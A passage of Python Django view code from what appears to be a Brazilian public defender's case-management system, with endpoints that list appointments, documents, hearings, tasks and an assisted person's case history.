a.responsavel_nome and not atendimento_online else False,\r\n 'atrasado': True if a.data_agendamento and a.data_agendamento < datetime.now() else False,\r\n 'prazo': a.prazo,\r\n 'prioridade': a.prioridade,\r\n 'cadastrado_por': a.cadastrado_por_nome,\r\n 'liberado_por': a.liberado_por_nome,\r\n 'atendido_por': a.atendido_por_nome,\r\n 'em_atendimento': {\r\n 'servidor': cron.servidor.nome if cron.servidor else None,\r\n 'servidor_id': cron.servidor.id if cron.servidor else None,\r\n 'data_inicio': cron.inicio\r\n } if cron else None,\r\n 'historico_agendamento': a.historico_agendamento\r\n })\r\n\r\n return JsonResponse(dados, safe=False)\r\n else:\r\n mensagem = 'Não há atuação/lotação para o dia selecionado'\r\n sucesso = True\r\n\r\n return JsonResponse({'success': sucesso, 'mensagem': mensagem})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_documentos(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n dados = simplejson.loads(request.body)\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n defensor = request.user.servidor.defensor\r\n\r\n try:\r\n inicio = datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n termino = datetime.combine(inicio, time.max)\r\n semana_anterior = inicio.fromordinal(inicio.toordinal() - 7)\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca.id\r\n\r\n nucleo = request.session.get('nucleo')\r\n\r\n # DOCUMENTOS\r\n if nucleo:\r\n defensorias = defensor.atuacoes(vigentes=True).filter(defensoria__nucleo=nucleo)\r\n else:\r\n defensorias = defensor.atuacoes(vigentes=True).filter(defensoria__comarca=comarca)\r\n\r\n defensorias = set(defensorias.values_list('defensoria_id', flat=True))\r\n\r\n documentos = AtendimentoDocumento.objects.filter(\r\n Q(atendimento__defensor__defensoria__in=defensorias) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n ) &\r\n (\r\n (\r\n Q(documento_online_id=None) &\r\n (\r\n Q(analisar=True) |\r\n Q(data_enviado=None) |\r\n Q(data_enviado__range=[semana_anterior, termino])\r\n )\r\n ) |\r\n (\r\n ~Q(prazo_resposta=None) &\r\n Q(status_resposta=AtendimentoDocumento.STATUS_RESPOSTA_PENDENTE)\r\n )\r\n ) &\r\n Q(atendimento__ativo=True) &\r\n Q(ativo=True)\r\n ).order_by(\r\n 'prazo_resposta',\r\n '-data_enviado',\r\n 'data_cadastro'\r\n ).values(\r\n 'id',\r\n 'nome',\r\n 'arquivo',\r\n 'atendimento__numero',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__inicial__partes__pessoa__nome',\r\n 'atendimento__partes__pessoa__nome_social',\r\n 'atendimento__inicial__partes__pessoa__nome_social',\r\n 'data_cadastro',\r\n 'data_enviado',\r\n 'arquivo',\r\n 'cadastrado_por_id',\r\n 'cadastrado_por__nome',\r\n 'enviado_por_id',\r\n 'enviado_por__nome',\r\n 'documento_online_id',\r\n 'prazo_resposta',\r\n 'analisar',\r\n )\r\n\r\n dados = []\r\n for a in documentos:\r\n requerente = None\r\n if a['atendimento__partes__pessoa__nome_social']:\r\n requerente = a['atendimento__partes__pessoa__nome_social']\r\n elif a['atendimento__inicial__partes__pessoa__nome_social']:\r\n requerente = a['atendimento__inicial__partes__pessoa__nome_social']\r\n elif a['atendimento__partes__pessoa__nome']:\r\n requerente = a['atendimento__partes__pessoa__nome']\r\n else:\r\n requerente = a['atendimento__inicial__partes__pessoa__nome']\r\n dados.append({\r\n 'id': a['id'],\r\n 'nome': a['nome'],\r\n 'arquivo': a['arquivo'],\r\n 'atendimento_numero': a['atendimento__numero'],\r\n 'requerente': requerente,\r\n 'enviado': True if a['data_enviado'] or a['documento_online_id'] else False,\r\n 'prazo': True if a['prazo_resposta'] else False,\r\n 'prazo_resposta': a['prazo_resposta'],\r\n 'prazo_resposta_dias': (a['prazo_resposta'].date() - date.today()).days if a['prazo_resposta'] else None, # noqa: E501\r\n 'data_cadastro': a['data_cadastro'],\r\n 'data_enviado': a['data_enviado'],\r\n 'cadastrado_por_id': a['cadastrado_por_id'],\r\n 'cadastrado_por_nome': a['cadastrado_por__nome'],\r\n 'enviado_por_id': a['enviado_por_id'],\r\n 'enviado_por_nome': a['enviado_por__nome'],\r\n 'documento_online_id': a['documento_online_id'],\r\n 'analisar': a['analisar'],\r\n })\r\n\r\n return JsonResponse(dados, safe=False)\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_resumo(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n dados = simplejson.loads(request.body)\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n defensor = request.user.servidor.defensor\r\n defensorias = set(defensor.atuacoes(vigentes=True).values_list('defensoria_id', flat=True))\r\n\r\n try:\r\n inicio = datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n if request.session.get('comarca'):\r\n comarca = Comarca.objects.get(id=request.session['comarca'])\r\n else:\r\n comarca = request.user.servidor.comarca\r\n\r\n nucleo = request.session.get('nucleo')\r\n\r\n dia_semana, dias_mes = calendar.monthrange(inicio.year, inicio.month)\r\n\r\n # AGENDAMENTOS\r\n\r\n agendamentos = []\r\n for dia in range(dias_mes):\r\n agendamentos.append({'dia': dia + 1, 'pauta': 0, 'extra': 0})\r\n\r\n if nucleo:\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n defensoria__nucleo=nucleo,\r\n tipo__in=[1, 2, 4, 9])\r\n else:\r\n atendimentos = AtendimentoDefensor.objects.filter(\r\n defensoria__comarca=comarca,\r\n defensoria__nucleo=None,\r\n tipo__in=[1, 2, 4, 9])\r\n\r\n if defensor.eh_defensor:\r\n atendimentos = atendimentos.filter(\r\n (\r\n (\r\n Q(defensor=defensor)\r\n & Q(substituto=None)\r\n ) |\r\n Q(substituto=defensor)\r\n ) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n elif nucleo and nucleo.supervisionado:\r\n atendimentos = atendimentos.filter(\r\n Q(responsavel=defensor) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n else:\r\n atendimentos = atendimentos.filter(\r\n Q(defensoria__in=defensorias) &\r\n Q(remarcado=None) &\r\n Q(ativo=True)\r\n )\r\n\r\n for dias in atendimentos.extra(\r\n select={\r\n 'day': \"DATE_PART('day', atendimento_atendimento.data_agendamento)\",\r\n 'hour': \"DATE_PART('hour', atendimento_atendimento.data_agendamento)\",\r\n 'minute': \"DATE_PART('minute', atendimento_atendimento.data_agendamento)\"\r\n }\r\n ).values(\r\n 'day', 'hour', 'minute'\r\n ).annotate(\r\n # noqa\r\n Count('id')\r\n ).filter(\r\n data_agendamento__year=inicio.year,\r\n data_agendamento__month=inicio.month\r\n ).order_by('day'):\r\n\r\n dia = int(dias['day'] - 1)\r\n\r\n if dias['hour'] or dias['minute']:\r\n agendamentos[dia]['pauta'] += dias['id__count']\r\n else:\r\n agendamentos[dia]['extra'] += dias['id__count']\r\n\r\n # AUDIENCIAS\r\n\r\n audiencias = []\r\n for dia in range(dias_mes):\r\n audiencias.append({'dia': dia + 1, 'marcadas': 0, 'realizadas': 0, 'canceladas': 0})\r\n\r\n # Filtro base para audiências\r\n q_audiencias = Q()\r\n q_audiencias &= Q(tipo__audiencia=True)\r\n q_audiencias &= Q(data_protocolo__year=inicio.year)\r\n q_audiencias &= Q(data_protocolo__month=inicio.month)\r\n q_audiencias &= Q(ativo=True)\r\n\r\n # TODO: Unificar filtros defensor e assessor (ver impacto onde tem vários defensores na mesma defensoria)\r\n # Se defensor, vê apenas suas audiências na comarca\r\n if defensor.eh_defensor:\r\n q_audiencias &= Q(defensor_cadastro=defensor)\r\n # Se assessor, vê audiêcias de todas as defensorias onde está lotado\r\n else:\r\n q_audiencias &= Q(defensoria__in=defensorias)\r\n\r\n # TODO: Aplicar este filtro na variável defensorias (replicar pra toda view)\r\n if nucleo:\r\n q_audiencias &= Q(defensoria__nucleo=nucleo)\r\n else:\r\n q_audiencias &= Q(defensoria__comarca=comarca)\r\n\r\n audiencias_lst = Audiencia.objects.extra(\r\n select={'day': \"DATE_PART('day', data_protocolo)\"}\r\n ).values(\r\n 'day',\r\n 'audiencia_status'\r\n ).annotate(\r\n Count('id')\r\n ).filter(\r\n q_audiencias\r\n ).order_by('day')\r\n\r\n for dias in audiencias_lst:\r\n\r\n dia = int(dias['day'] - 1)\r\n\r\n if dias['audiencia_status'] == 0:\r\n audiencias[dia]['marcadas'] = dias['id__count']\r\n elif dias['audiencia_status'] == 1:\r\n audiencias[dia]['realizadas'] = dias['id__count']\r\n elif dias['audiencia_status'] == 2:\r\n audiencias[dia]['canceladas'] = dias['id__count']\r\n\r\n return JsonResponse({\r\n 'agendamentos': agendamentos,\r\n 'audiencias': audiencias,\r\n 'ativar_acompanhamento_processo': config.ATIVAR_ACOMPANHAMENTO_PROCESSO,\r\n })\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\n@login_required\r\n@permission_required('atendimento.view_defensor')\r\ndef index_get_tarefas(request):\r\n\r\n if request.method == 'POST' and request.is_ajax():\r\n\r\n dados = simplejson.loads(request.body)\r\n\r\n tarefas = Tarefa.objects.none() # Consulta vazia é retornada por padrão\r\n atuacoes = Atuacao.objects.none() # Consulta vazia é retornada por padrão\r\n\r\n if hasattr(request.user.servidor, 'defensor'):\r\n\r\n defensor = request.user.servidor.defensor\r\n\r\n try:\r\n inicio = datetime.strptime(dados['data'][:10], '%Y-%m-%d')\r\n except KeyError:\r\n inicio = date.today()\r\n\r\n termino = datetime.combine(inicio, time.max)\r\n\r\n # Atuacoes vigentes para o dia\r\n atuacoes = Atuacao.objects.vigentes_por_defensor(defensor=defensor, inicio=inicio)\r\n atuacoes = set(atuacoes.values_list('defensoria', flat=True))\r\n\r\n # filtro geral\r\n q = (\r\n Q(origem=None) &\r\n ~Q(\r\n Q(titulo='Solicitação de Apoio Respondida') &\r\n Q(responsavel=None) &\r\n Q(data_inicial=None) &\r\n Q(data_final=None)\r\n ) &\r\n (\r\n Q(movimento__isnull=False) |\r\n (\r\n Q(atendimento__ativo=True) &\r\n (\r\n (\r\n Q(atendimento__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__partes__responsavel=True) &\r\n Q(atendimento__partes__ativo=True)\r\n ) |\r\n (\r\n Q(atendimento__inicial__partes__tipo=AtendimentoPessoa.TIPO_REQUERENTE) &\r\n Q(atendimento__inicial__partes__responsavel=True) &\r\n Q(atendimento__inicial__partes__ativo=True)\r\n )\r\n )\r\n )\r\n ) &\r\n (\r\n Q(all_respostas=None) |\r\n (\r\n ~Q(all_respostas__finalizado=None) &\r\n Q(all_respostas__ativo=True)\r\n )\r\n )\r\n )\r\n\r\n # Configuração para exibir ou não as cooperações cumpridas\r\n if not config.EXIBIR_COOPERACOES_CUMPRIDAS_PARA_RESPONSAVEL:\r\n q &= ~Q(\r\n Q(prioridade=Tarefa.PRIORIDADE_COOPERACAO) &\r\n Q(status=Tarefa.STATUS_CUMPRIDO) &\r\n Q(setor_responsavel__in=atuacoes)\r\n )\r\n\r\n # filtro do usuário\r\n qs = Q()\r\n\r\n # tarefas com resposta para as atuações vigentes\r\n qs |= Q(resposta_para__in=atuacoes)\r\n\r\n if defensor.eh_defensor or request.user.is_superuser or request.user.has_perm(perm='atendimento.view_all_tarefas'): # noqa: E501\r\n\r\n # tarefas de atendimentos das atuações vigentes\r\n qs |= Q(setor_responsavel__in=atuacoes)\r\n\r\n # tarefas de atendimentos feitos no itinerante\r\n qs |= (\r\n Q(atendimento__defensor__defensoria__nucleo__itinerante=True) &\r\n Q(atendimento__defensor__defensor=defensor)\r\n )\r\n\r\n if config.HERDAR_TAREFAS_DOS_SUPERVISIONADOS:\r\n\r\n # Todos servidores vinculados as atuacoes do defensor\r\n servidores = set(Atuacao.objects.filter(\r\n defensoria__in=atuacoes\r\n ).vigentes().values_list('defensor__servidor_id', flat=True))\r\n\r\n qs |= Q(responsavel__in=servidores)\r\n\r\n else:\r\n\r\n qs |= Q(responsavel=defensor.servidor_id)\r\n\r\n else: # filtro-base analista\r\n\r\n # tarefas cadastradas pelo servidor\r\n qs |= Q(cadastrado_por=request.user.servidor)\r\n\r\n # tarefas onde o servidor é responsável\r\n qs |= Q(responsavel=request.user.servidor)\r\n\r\n # tarefas de atendimentos das atuações vigentes ou prioridade alerta\r\n qs |= Q(\r\n Q(setor_responsavel__in=atuacoes) &\r\n Q(prioridade__in=[Tarefa.PRIORIDADE_ALERTA, Tarefa.PRIORIDADE_COOPERACAO])\r\n )\r\n\r\n q &= qs\r\n\r\n tarefas = Tarefa.objects.ativos().filter(q).values(\r\n 'id',\r\n 'data_finalizado',\r\n 'data_final',\r\n 'data_inicial',\r\n 'prioridade',\r\n 'responsavel_id',\r\n 'responsavel__nome',\r\n 'setor_responsavel__nome',\r\n 'atendimento__nucleo__nome',\r\n 'titulo',\r\n 'status',\r\n 'atendimento__numero',\r\n 'atendimento__agenda',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__inicial__partes__pessoa__nome',\r\n 'atendimento__partes__pessoa__nome_social',\r\n 'atendimento__inicial__partes__pessoa__nome_social',\r\n 'movimento_id',\r\n 'movimento__procedimento__uuid',\r\n 'movimento__procedimento__numero',\r\n 'all_respostas__finalizado__nome',\r\n 'resposta_para',\r\n 'resposta_para__nome',\r\n 'visualizacoes'\r\n ).order_by(\r\n 'data_inicial', 'prioridade', 'data_final', 'id', '-all_respostas__id'\r\n ).distinct(\r\n 'data_inicial', 'prioridade', 'data_final', 'id'\r\n )\r\n\r\n dados = []\r\n\r\n # tarefas aguardando\r\n tarefas_ativas = tarefas.filter(\r\n (\r\n Q(data_final__gte=termino) |\r\n Q(data_final=None)\r\n ) &\r\n Q(data_finalizado=None) &\r\n Q(status=Tarefa.STATUS_CADASTRO)\r\n ).order_by(\r\n 'data_inicial',\r\n 'prioridade',\r\n 'data_final'\r\n )\r\n\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_ativas,\r\n inicio, termino,\r\n Tarefa.TAREFA_AGUARDANDO,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas atrasadas\r\n tarefas_atrasadas = tarefas.filter(\r\n data_finalizado=None,\r\n data_final__lt=inicio,\r\n status=Tarefa.STATUS_CADASTRO\r\n ).order_by(\r\n 'prioridade',\r\n '-data_final'\r\n )\r\n\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_atrasadas,\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_ATRASADA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas com pendencias\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas.filter(data_finalizado=None, status=Tarefa.STATUS_PENDENTE),\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_PENDENCIA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n tarefas_cumpridas = tarefas.filter(data_finalizado=None, status=Tarefa.STATUS_CUMPRIDO)\r\n\r\n if config.DIA_LIMITE_EXIBICAO_TAREFAS_CUMPRIDAS > 0:\r\n data_base = date.today() - timedelta(days=config.DIA_LIMITE_EXIBICAO_TAREFAS_CUMPRIDAS)\r\n tarefas_cumpridas = tarefas_cumpridas.filter(all_respostas__data_finalizado__gte=data_base)\r\n\r\n # tarefas cumpridas\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas_cumpridas,\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_CUMPRIDA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n # tarefas finalizadas\r\n index_get_tarefas_to_array(\r\n dados,\r\n tarefas.filter(data_finalizado__range=[inicio, termino]),\r\n inicio,\r\n termino,\r\n Tarefa.TAREFA_FINALIZADA,\r\n atuacoes,\r\n request.user.servidor\r\n )\r\n\r\n return JsonResponse(dados, safe=False)\r\n\r\n return JsonResponse({'success': False})\r\n\r\n\r\ndef index_get_tarefas_to_array(arr, queryset, inicio, termino, status, atuacoes, servidor):\r\n\r\n for t in queryset:\r\n\r\n assistido = None\r\n if t['atendimento__partes__pessoa__nome_social']:\r\n assistido = t['atendimento__partes__pessoa__nome_social']\r\n elif t['atendimento__inicial__partes__pessoa__nome_social']:\r\n assistido = t['atendimento__inicial__partes__pessoa__nome_social']\r\n elif t['atendimento__partes__pessoa__nome']:\r\n assistido = t['atendimento__partes__pessoa__nome']\r\n else:\r\n assistido = t['atendimento__inicial__partes__pessoa__nome']\r\n\r\n arr.append({\r\n 'id': t['id'],\r\n 'ultima_resposta': t['all_respostas__finalizado__nome'],\r\n 'atendimento_numero': t['atendimento__numero'],\r\n 'nucleo': t['atendimento__nucleo__nome'],\r\n 'defensoria': t['setor_responsavel__nome'],\r\n 'titulo': t['titulo'],\r\n 'responsavel': t['responsavel__nome'],\r\n 'resposta_para': t['resposta_para__nome'],\r\n 'assistido': assistido,\r\n 'movimento': t['movimento_id'],\r\n 'propac_uuid': t['movimento__procedimento__uuid'],\r\n 'propac_numero': t['movimento__procedimento__numero'],\r\n 'prioridade': t['prioridade'],\r\n 'data_inicial': Util.date_to_json(t['data_inicial']) if t['data_inicial'] else None,\r\n 'data_final': Util.date_to_json(t['data_final']) if t['data_final'] else None,\r\n 'data_finalizado': Util.date_to_json(t['data_finalizado']) if t['data_finalizado'] else None,\r\n 'agenda': t['atendimento__agenda'],\r\n 'visualizada': bool(t['visualizacoes']),\r\n 'status': status,\r\n 'acompanhando': t['responsavel_id'] != servidor.id,\r\n 'eh_alerta': t['prioridade'] == Tarefa.PRIORIDADE_ALERTA,\r\n 'eh_cooperacao': t['prioridade'] == Tarefa.PRIORIDADE_COOPERACAO,\r\n 'eh_tarefa': t['prioridade'] not in (Tarefa.PRIORIDADE_ALERTA, Tarefa.PRIORIDADE_COOPERACAO)\r\n })\r\n\r\n\r\n@never_cache\r\n@login_required\r\ndef listar(request):\r\n\r\n if request.GET.get('next'):\r\n request.session['next'] = request.GET.get('next')\r\n\r\n if request.GET.get('pessoa_id'):\r\n request.session['pessoa_id'] = request.GET.get('pessoa_id')\r\n\r\n if request.GET.get('ligacao_numero'):\r\n ligacao = Atendimento.objects.get(numero=request.GET.get('ligacao_numero'))\r\n request.session['ligacao_id'] = ligacao.id\r\n return redirect('{}?ligacao_numero={}'.format(reverse('atendimento_listar'), ligacao.numero))\r\n else:\r\n return redirect('atendimento_listar')\r\n\r\n assistido = request.session.get('pessoa_id')\r\n\r\n # ATENDIMENTOS EXCLUIDOS\r\n atendimentos_excluidos = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=False,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento_id',\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n 'atendimento__historico_recepcao',\r\n 'atendimento__agendado_por__nome',\r\n 'atendimento__data_cadastro',\r\n 'atendimento__historico',\r\n 'atendimento__atendido_por__nome',\r\n 'atendimento__data_exclusao',\r\n 'atendimento__motivo_exclusao',\r\n 'atendimento__excluido_por__nome',\r\n ).order_by(\r\n '-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_excluidos:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_cadastro': parte['atendimento__data_cadastro'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None,\r\n 'recepcao': None,\r\n 'agendado_por': parte['atendimento__agendado_por__nome'],\r\n 'historico_agendamento': parte['atendimento__historico_recepcao'],\r\n 'historico_defensor': parte['atendimento__historico'],\r\n 'atendido_por': parte['atendimento__atendido_por__nome'],\r\n 'data_exclusao': parte['atendimento__data_exclusao'],\r\n 'motivo_exclusao': parte['atendimento__motivo_exclusao'],\r\n 'excluido_por': parte['atendimento__excluido_por__nome'],\r\n })\r\n\r\n atendimentos[-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=parte['atendimento_id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_excluidos = atendimentos\r\n\r\n # ATENDIMENTOS COMO REQUERENTE\r\n atendimentos_requerente = AtendimentoPessoa.objects.select_related(\"atendimento\").filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento_id',\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__defensoria__atuacao',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n 'atendimento__historico_recepcao',\r\n 'atendimento__agendado_por__nome',\r\n 'atendimento__data_cadastro',\r\n 'atendimento__historico',\r\n 'atendimento__atendido_por__nome',\r\n ).order_by(\r\n '-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n arquivados_status = {}\r\n\r\n if arquivamento_esta_habilitado():\r\n # TODO verificar possibilidade de refatorar o status arquivado de property\r\n # para uma coluna física a fim de otimizar as consultas\r\n atendimentos_numeros = [atendimento['atendimento__numero'] for atendimento in atendimentos_requerente]\r\n arquivados_status = consulta_status_arquivado(atendimentos_numeros) or dict()\r\n\r\n for parte in atendimentos_requerente:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_cadastro': parte['atendimento__data_cadastro'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'atuacao': parte['atendimento__defensor__defensoria__atuacao'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None,\r\n 'recepcao': None,\r\n 'agendado_por': parte['atendimento__agendado_por__nome'],\r\n 'historico_agendamento': parte['atendimento__historico_recepcao'],\r\n 'historico_defensor': parte['atendimento__historico'],\r\n 'atendido_por': parte['atendimento__atendido_por__nome'],\r\n 'atendimento_principal_arquivado': arquivados_status.get(parte['atendimento__numero'], False)\r\n })\r\n\r\n atendimentos[-1]['recepcao'] = Atendimento.objects.filter(\r\n origem=parte['atendimento_id'], tipo=Atendimento.TIPO_RECEPCAO, ativo=True\r\n ).values('data_atendimento', 'atendido_por__nome', 'historico').first()\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_como_requerente = atendimentos\r\n\r\n # ATENDIMENTOS COMO NÃO HIPOSSUFICIÊNCIA\r\n indeferimentos = Indeferimento.objects.annotate(\r\n recursos=Sum(\r\n Case(\r\n When(processo__eventos__tipo__tipo=CoreTipoEvento.TIPO_RECURSO, then=1),\r\n output_field=IntegerField()\r\n ))\r\n ).filter(\r\n Q(pessoa=assistido) &\r\n Q(processo__desativado_em=None) &\r\n Q(processo__classe__tipo=CoreClasse.TIPO_NEGACAO_HIPOSSUFICIENCIA) &\r\n Q(\r\n Q(recursos=0) |\r\n Q(resultado=Indeferimento.RESULTADO_INDEFERIDO)\r\n )\r\n )\r\n\r\n # ATENDIMENTOS COMO REQUERIDO\r\n atendimentos_requerido = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERIDO,\r\n ativo=True,\r\n atendimento__tipo__in=[Atendimento.TIPO_INICIAL, Atendimento.TIPO_VISITA],\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__defensor__servidor__nome',\r\n 'atendimento__defensor__defensoria__nome',\r\n 'atendimento__defensor__nucleo__nome',\r\n 'atendimento__qualificacao__titulo',\r\n 'atendimento__qualificacao__area__nome',\r\n ).order_by(\r\n '-atendimento__data_atendimento', 'atendimento__data_agendamento', 'atendimento__numero'\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_requerido:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'data_agendamento': parte['atendimento__data_agendamento'],\r\n 'data_atendimento': parte['atendimento__data_atendimento'],\r\n 'defensor': parte['atendimento__defensor__defensor__servidor__nome'],\r\n 'defensoria': parte['atendimento__defensor__defensoria__nome'],\r\n 'nucleo': parte['atendimento__defensor__nucleo__nome'],\r\n 'qualificacao': parte['atendimento__qualificacao__titulo'],\r\n 'area': parte['atendimento__qualificacao__area__nome'],\r\n 'requerente': None,\r\n 'requerido': None\r\n })\r\n\r\n if parte['atendimento__partes__tipo'] == 0:\r\n atendimentos[-1]['requerente'] = parte['atendimento__partes__pessoa__nome']\r\n else:\r\n atendimentos[-1]['requerido'] = parte['atendimento__partes__pessoa__nome']\r\n\r\n atendimentos_como_requerido = atendimentos\r\n\r\n # PROCESSOS\r\n atendimentos_processo = AtendimentoPessoa.objects.filter(\r\n pessoa=assistido,\r\n tipo=AtendimentoPessoa.TIPO_REQUERENTE,\r\n ativo=True,\r\n atendimento__tipo=Atendimento.TIPO_PROCESSO,\r\n atendimento__inicial=None,\r\n atendimento__remarcado=None,\r\n atendimento__ativo=True,\r\n atendimento__partes__ativo=True,\r\n atendimento__partes__responsavel=True\r\n ).values(\r\n 'atendimento__numero',\r\n 'atendimento__data_agendamento',\r\n 'atendimento__data_atendimento',\r\n 'atendimento__partes__tipo',\r\n 'atendimento__partes__pessoa__nome',\r\n 'atendimento__defensor__parte__parte',\r\n 'atendimento__defensor__parte__data_cadastro',\r\n 'atendimento__defensor__parte__processo__tipo',\r\n 'atendimento__defensor__parte__processo__numero',\r\n 'atendimento__defensor__parte__processo__acao__nome',\r\n 'atendimento__defensor__parte__processo__vara__nome',\r\n 'atendimento__defensor__parte__processo__area__nome',\r\n )\r\n\r\n atendimentos = []\r\n for parte in atendimentos_processo:\r\n\r\n if not atendimentos or parte['atendimento__numero'] != atendimentos[-1]['numero']:\r\n\r\n processo_tipo = parte['atendimento__defensor__parte__processo__tipo']\r\n\r\n if processo_tipo:\r\n processo_tipo = Processo.LISTA_TIPO[processo_tipo][1]\r\n\r\n atendimentos.append({\r\n 'numero': parte['atendimento__numero'],\r\n 'processo': parte['atendimento__defensor__parte__processo__numero'],\r\n 'processo_parte': parte['atendimento__defensor__parte__parte'],\r\n 'processo_acao': parte['atendimento__defensor__parte__processo__acao__nome'],\r\n 'processo_vara': 